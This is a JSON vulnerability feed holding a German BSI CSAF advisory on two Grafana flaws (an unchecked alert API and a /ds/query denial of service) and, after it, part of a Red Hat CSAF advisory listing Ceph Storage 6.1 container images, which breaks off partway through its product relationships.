{ "document": { "aggregate_severity": { "text": "mittel" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "Grafana ist eine Open-Source Analyse- und Visualisierungssoftware.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter, authentisierter oder anonymer Angreifer kann mehrere Schwachstellen in Grafana ausnutzen, um Sicherheitsvorkehrungen zu umgehen und um einen Denial of Service Zustand herbeizuf\u00fchren.", "title": "Angriff" }, { "category": "general", "text": "- UNIX\n- Linux\n- Windows\n- Sonstiges", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2023-1384 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-1384.json" }, { "category": "self", "summary": "WID-SEC-2023-1384 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-1384" }, { "category": "external", "summary": "Grafana security release vom 2023-06-06", "url": "https://grafana.com/blog/2023/06/06/grafana-security-release-new-grafana-versions-with-security-fixes-for-cve-2023-2183-and-cve-2023-2801/" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2023:2915-1 vom 2023-07-20", "url": "https://lists.suse.com/pipermail/sle-security-updates/2023-July/015548.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2023:2917-1 vom 2023-07-20", "url": "https://lists.suse.com/pipermail/sle-security-updates/2023-July/015546.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2023:2916-1 vom 2023-07-20", "url": "https://lists.suse.com/pipermail/sle-security-updates/2023-July/015547.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2023:3136-1 vom 2023-08-02", "url": "https://lists.suse.com/pipermail/sle-security-updates/2023-August/015741.html" }, { "category": "external", "summary": "IBM Security Bulletin 7074109 vom 2023-11-29", "url": "https://www.ibm.com/support/pages/node/7074109" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:7741 vom 2023-12-12", "url": "https://access.redhat.com/errata/RHSA-2023:7741" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:7740 vom 2023-12-12", "url": "https://access.redhat.com/errata/RHSA-2023:7740" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2024:0196-1 vom 2024-01-23", "url": "https://lists.suse.com/pipermail/sle-security-updates/2024-January/017743.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2024:0191-1 vom 2024-01-23", "url": "https://lists.suse.com/pipermail/sle-security-updates/2024-January/017744.html" } ], "source_lang": "en-US", "title": "Grafana: Mehrere Schwachstellen", "tracking": { "current_release_date": "2024-01-23T23:00:00.000+00:00", "generator": { "date": "2024-02-15T17:30:08.988+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2023-1384", "initial_release_date": "2023-06-06T22:00:00.000+00:00", "revision_history": [ { "date": "2023-06-06T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2023-07-20T22:00:00.000+00:00", "number": "2", "summary": "Neue Updates von SUSE aufgenommen" }, { "date": "2023-08-01T22:00:00.000+00:00", "number": "3", "summary": "Neue Updates von SUSE aufgenommen" }, { "date": "2023-11-28T23:00:00.000+00:00", "number": "4", "summary": "Neue Updates von IBM aufgenommen" }, { "date": "2023-12-12T23:00:00.000+00:00", "number": "5", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2024-01-23T23:00:00.000+00:00", "number": "6", "summary": "Neue Updates von SUSE aufgenommen" } ], "status": "final", "version": "6" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "IBM InfoSphere Information Server 11.7", "product": { "name": "IBM InfoSphere Information Server 11.7", "product_id": "444803", "product_identification_helper": { "cpe": "cpe:/a:ibm:infosphere_information_server:11.7" } } } ], "category": "vendor", "name": "IBM" }, { "branches": [ { "branches": [ { "category": "product_name", "name": "Open Source Grafana \u003c 9.5.3", "product": { "name": "Open Source Grafana \u003c 9.5.3", "product_id": "T027983", "product_identification_helper": { "cpe": "cpe:/a:grafana:grafana:9.5.3" } } }, { "category": "product_name", "name": "Open Source Grafana \u003c 9.4.12", "product": { "name": "Open Source Grafana \u003c 9.4.12", "product_id": "T027984", "product_identification_helper": { "cpe": "cpe:/a:grafana:grafana:9.4.12" } } }, { "category": "product_name", "name": "Open Source Grafana \u003c 9.3.15", "product": { "name": "Open Source Grafana \u003c 9.3.15", "product_id": "T027985", "product_identification_helper": { "cpe": "cpe:/a:grafana:grafana:9.3.15" } } }, { "category": "product_name", "name": "Open Source Grafana \u003c 9.2.19", "product": { "name": "Open Source Grafana \u003c 9.2.19", "product_id": "T027986", "product_identification_helper": { "cpe": "cpe:/a:grafana:grafana:9.2.19" } } }, { "category": "product_name", "name": "Open Source Grafana \u003c 8.5.26", "product": { "name": "Open Source Grafana \u003c 8.5.26", "product_id": "T027987", "product_identification_helper": { "cpe": "cpe:/a:grafana:grafana:8.5.26" } } } ], "category": "product_name", "name": "Grafana" } ], "category": "vendor", "name": "Open Source" }, { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux", "product": { "name": "Red Hat Enterprise Linux", "product_id": "67646", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "category": "product_name", "name": "SUSE Linux", "product": { "name": "SUSE Linux", "product_id": "T002207", "product_identification_helper": { "cpe": "cpe:/o:suse:suse_linux:-" } } } ], "category": "vendor", "name": "SUSE" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-2183", "notes": [ { "category": "description", "text": "Es gibt eine Schwachstelle in Grafana. Die API pr\u00fcft den Zugriff auf die Funktion \"API alert\" nicht. Ein authentifizierter Angreifer kann dies ausnutzen, um die konfigurierten Zugriffsregeln zu umgehen und Alarme \u00fcber die API zu senden, ohne die erforderliche Berechtigung zu haben. Ein erfolgreiches Ausnutzen der Schwachstelle erfordert eine Benutzerinteraktion." } ], "product_status": { "known_affected": [ "T002207", "67646", "444803" ] }, "release_date": "2023-06-06T22:00:00Z", "title": "CVE-2023-2183" }, { "cve": "CVE-2023-2801", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in Grafana, wenn mehrere unterschiedliche Datenquellen innerhalb eines einzigen \"\u00f6ffentlichen Dashboards\" oder API-Aufrufs an \"/ds/query\" verwendet werden. Ein entfernter Angreifer kann dies ausnutzen, um die Grafana-Instanz zum Absturz zu bringen, was zu einem Denial of Service-Zustand f\u00fchrt." } ], "product_status": { "known_affected": [ "T002207", "67646", "444803" ] }, "release_date": "2023-06-06T22:00:00Z", "title": "CVE-2023-2801" } ] }
rhsa-2023_7741
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Updated container image for Red Hat Ceph Storage 6.1 is now available in the Red Hat Ecosystem Catalog.", "title": "Topic" }, { "category": "general", "text": "Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.\n\nThis updated container image is based on Red Hat Ceph Storage 6.1 and Red Hat Enterprise Linux.\n\nSpace precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Ceph Storage Release Notes for information on the most significant of these changes:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6.1/html/release_notes/index\n\nAll users of Red Hat Ceph Storage are advised to pull these new images from the Red Hat Ecosystem catalog.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:7741", "url": "https://access.redhat.com/errata/RHSA-2023:7741" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003" }, { "category": "external", "summary": "2181117", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2181117" }, { "category": "external", "summary": "2186322", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2186322" }, { "category": "external", "summary": "2210840", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210840" }, { "category": "external", "summary": "2210848", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210848" }, { "category": "external", "summary": "2242803", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242803" }, { "category": "external", "summary": "2243296", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243296" }, { "category": "external", "summary": "2254041", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254041" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_7741.json" } ], "title": "Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update", "tracking": { "current_release_date": "2024-11-08T08:18:52+00:00", "generator": { "date": "2024-11-08T08:18:52+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.1.1" } }, "id": "RHSA-2023:7741", "initial_release_date": "2023-12-12T13:55:37+00:00", "revision_history": [ { "date": "2023-12-12T13:55:37+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-12-12T13:55:38+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-08T08:18:52+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Ceph Storage 6.1 Tools", "product": { "name": "Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools", "product_identification_helper": { "cpe": "cpe:/a:redhat:ceph_storage:6.1::el9" } } } ], "category": "product_family", "name": "Red Hat Ceph Storage" }, { "branches": [ { "category": "product_version", "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "product": { "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "product_id": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "product_identification_helper": { "purl": "pkg:oci/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-dashboard-rhel9\u0026tag=6-82" } } }, { "category": "product_version", "name": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "product": { "name": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "product_id": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "product_identification_helper": { "purl": "pkg:oci/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/keepalived-rhel9\u0026tag=2.2.8-4" } } }, { "category": "product_version", "name": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "product": { "name": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "product_id": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "product_identification_helper": { "purl": "pkg:oci/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/rhceph-promtail-rhel9\u0026tag=v2.4.0-12" } } }, { "category": "product_version", "name": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "product": { "name": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "product_id": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "product_identification_helper": { "purl": "pkg:oci/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-rhel9\u0026tag=6-263" } } }, { "category": "product_version", "name": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "product": { "name": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "product_id": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "product_identification_helper": { "purl": "pkg:oci/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/rhceph-haproxy-rhel9\u0026tag=2.4.22-5" } } }, { "category": "product_version", "name": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "product": { "name": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "product_id": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "product_identification_helper": { "purl": "pkg:oci/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8?arch=s390x\u0026repository_url=registry.redhat.io/rhceph/snmp-notifier-rhel9\u0026tag=1.2.1-48" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64", "product": { "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64", "product_id": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64", "product_identification_helper": { "purl": "pkg:oci/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-dashboard-rhel9\u0026tag=6-82" } } }, { "category": "product_version", "name": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "product": { "name": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "product_id": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "product_identification_helper": { "purl": "pkg:oci/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/keepalived-rhel9\u0026tag=2.2.8-4" } } }, { "category": "product_version", "name": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "product": { "name": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "product_id": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "product_identification_helper": { "purl": "pkg:oci/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/rhceph-promtail-rhel9\u0026tag=v2.4.0-12" } } }, { "category": "product_version", "name": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "product": { "name": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "product_id": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "product_identification_helper": { "purl": "pkg:oci/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-rhel9\u0026tag=6-263" } } }, { "category": "product_version", "name": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "product": { "name": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "product_id": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "product_identification_helper": { "purl": "pkg:oci/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/rhceph-haproxy-rhel9\u0026tag=2.4.22-5" } } }, { "category": "product_version", "name": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64", "product": { "name": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64", "product_id": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64", "product_identification_helper": { "purl": "pkg:oci/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e?arch=amd64\u0026repository_url=registry.redhat.io/rhceph/snmp-notifier-rhel9\u0026tag=1.2.1-48" } } } ], "category": "architecture", "name": "amd64" }, { "branches": [ { "category": "product_version", "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "product": { "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "product_id": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "product_identification_helper": { "purl": "pkg:oci/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-dashboard-rhel9\u0026tag=6-82" } } }, { "category": "product_version", "name": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "product": { "name": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "product_id": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "product_identification_helper": { "purl": "pkg:oci/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/keepalived-rhel9\u0026tag=2.2.8-4" } } }, { "category": "product_version", "name": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "product": { "name": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "product_id": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "product_identification_helper": { "purl": "pkg:oci/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/rhceph-promtail-rhel9\u0026tag=v2.4.0-12" } } }, { "category": "product_version", "name": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "product": { "name": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "product_id": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "product_identification_helper": { "purl": "pkg:oci/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/rhceph-6-rhel9\u0026tag=6-263" } } }, { "category": "product_version", "name": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "product": { "name": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "product_id": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "product_identification_helper": { "purl": "pkg:oci/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/rhceph-haproxy-rhel9\u0026tag=2.4.22-5" } } }, { "category": "product_version", "name": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "product": { "name": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "product_id": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "product_identification_helper": { "purl": "pkg:oci/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42?arch=ppc64le\u0026repository_url=registry.redhat.io/rhceph/snmp-notifier-rhel9\u0026tag=1.2.1-48" } } } ], "category": "architecture", "name": "ppc64le" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64" }, "product_reference": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x" }, "product_reference": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le" }, "product_reference": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x" }, "product_reference": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le" }, "product_reference": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" }, "product_reference": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64" }, "product_reference": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": 